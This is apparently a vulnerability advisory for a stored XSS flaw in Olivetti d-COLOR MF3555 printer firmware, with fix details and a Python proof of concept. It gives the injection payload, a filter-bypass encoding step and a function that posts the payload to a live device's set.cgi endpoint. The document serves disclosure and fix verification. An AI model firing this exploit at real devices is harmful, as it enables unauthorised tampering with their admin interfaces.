
CVE-2022-25344

CVE-2022-25344 – Olivetti d-COLOR MF3555

Vulnerability Description: CWE-79: Stored Cross-Site Scripting
Software Version: Firmware 2XD_S000.002.271
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-25344
CVSS v3: 6.1
Severity: Medium
Credits: Mattia Campanelli, Luca Carbone, Massimiliano Brolli

An issue was discovered on Olivetti d-COLOR MF3555 2XD_S000.002.271 devices. The web application does not properly validate the parameters sent in a POST request to /dvcset/sysset/set.cgi, in particular the arg01.Hostname field, before saving them on the device. The stored value is later served back without output encoding, so malicious JavaScript placed in the hostname is rendered to the end user and executed by the web browser.

NOTE: This vulnerability is fixed in firmware version 2XD_S000.002.703, available since January 17th, 2022, and in later versions.

Step-by-step instructions and PoC

The vulnerable functionality can be reached through the following actions:

  • Impostazioni Dispositivo > Sistema (Device Settings > System)
    A PoC is possible by intercepting the POST request to /dvcset/sysset/set.cgi that is sent when the settings on this page are updated, and inserting the malicious string in the arg01.Hostname parameter:
  • <img src=# onerror=alert(1337)/>
    The payload needs to be URL encoded in order to bypass the client-side security filters. Subsequently, visiting the /jobs page triggers the stored malicious JavaScript.
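The following script is an added example written for this page; it is not the PoC code used by the TIM red team. It builds the URL-encoded form body for the set.cgi request exactly as the procedure above describes, models the two halves of the bug (a handler that stores arg01.Hostname unvalidated, and a /jobs page that interpolates it raw) next to the output-encoded form that fixes it, and provides the verbatim-match check used to confirm whether the payload is live. The simulated handler and /jobs template are constructed and are not the device firmware; the advisory names only arg01.Hostname, so any other fields in the real form, and the name and format of the admin session cookie needed for the live request, are assumptions.

```python
import html
from urllib.parse import urlencode, parse_qs
from urllib.request import Request, urlopen

# Payload and endpoint from the advisory
PAYLOAD = '<img src=# onerror=alert(1337)/>'
ENDPOINT = "/dvcset/sysset/set.cgi"
PARAM = "arg01.Hostname"


def build_set_cgi_body(hostname: str) -> str:
    """Form body for the POST to /dvcset/sysset/set.cgi.

    urlencode() applies the URL encoding the advisory requires: '<', '=',
    '#', '(', ')', '/' and '>' all become %XX escapes, so no raw HTML
    metacharacter survives in the request body. Only arg01.Hostname is
    named by the advisory; the real form may carry further fields (assumption).
    """
    return urlencode({PARAM: hostname})


def store_hostname(body: str) -> str:
    """Simulated server side (constructed, not the device firmware).

    Decodes the form as a CGI handler would and stores the value without any
    validation, i.e. the "doesn't properly check parameters" half of the bug.
    """
    fields = parse_qs(body, keep_blank_values=True)
    return fields[PARAM][0]


def render_jobs_page_vulnerable(hostname: str) -> str:
    """Simulated /jobs page that interpolates the stored hostname raw."""
    return f"<html><body><h1>Jobs on {hostname}</h1></body></html>"


def render_jobs_page_fixed(hostname: str) -> str:
    """Same page with HTML output encoding: the fix pattern for CWE-79."""
    return f"<html><body><h1>Jobs on {html.escape(hostname, quote=True)}</h1></body></html>"


def payload_is_live(page: str, payload: str = PAYLOAD) -> bool:
    """Verification check: True only if the payload appears verbatim.

    A verbatim match means the browser parses it as markup; the escaped form
    (&lt;img ...) is inert text, so the check correctly reports False for it.
    """
    return payload in page


def poc_against_device(base_url: str, cookie: str, timeout: float = 10.0) -> bool:
    """Live PoC (not executed by this script). Assumes an authenticated admin
    session cookie taken from the web UI; its name and format are not in the
    advisory. Returns True if /jobs serves the payload unescaped.
    """
    base = base_url.rstrip("/")
    req = Request(
        base + ENDPOINT,
        data=build_set_cgi_body(PAYLOAD).encode(),
        headers={"Content-Type": "application/x-www-form-urlencoded",
                 "Cookie": cookie},
        method="POST",
    )
    with urlopen(req, timeout=timeout) as resp:
        resp.read()
    # The XSS is stored: it fires on a later GET of /jobs, not in the POST reply.
    with urlopen(Request(base + "/jobs", headers={"Cookie": cookie}),
                 timeout=timeout) as resp:
        return payload_is_live(resp.read().decode("utf-8", "replace"))


if __name__ == "__main__":
    body = build_set_cgi_body(PAYLOAD)
    stored = store_hostname(body)
    print("POST body:", body)
    print("vulnerable /jobs fires payload:", payload_is_live(render_jobs_page_vulnerable(stored)))
    print("fixed /jobs fires payload:", payload_is_live(render_jobs_page_fixed(stored)))
```

Running the script without arguments only exercises the simulated handler and templates; poc_against_device() is there to show the real two-step exchange (POST to set.cgi, then GET /jobs) and should be pointed at a device only with authorisation. The same payload_is_live() check, run against a firmware 2XD_S000.002.703 or later device, is the regression test for the fix.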

Affected Endpoints

  • URL: /dvcset/sysset/set.cgi
  • HTTP Parameter: Host (arg01.Hostname)

Below is the evidence, with the vulnerability details and the payloads used.

Figure 1: Administrative page to change the Host name

Figure 2: The malicious payload, URL encoded to bypass the client-side filters

Figure 3: The stored JavaScript executing on the /jobs page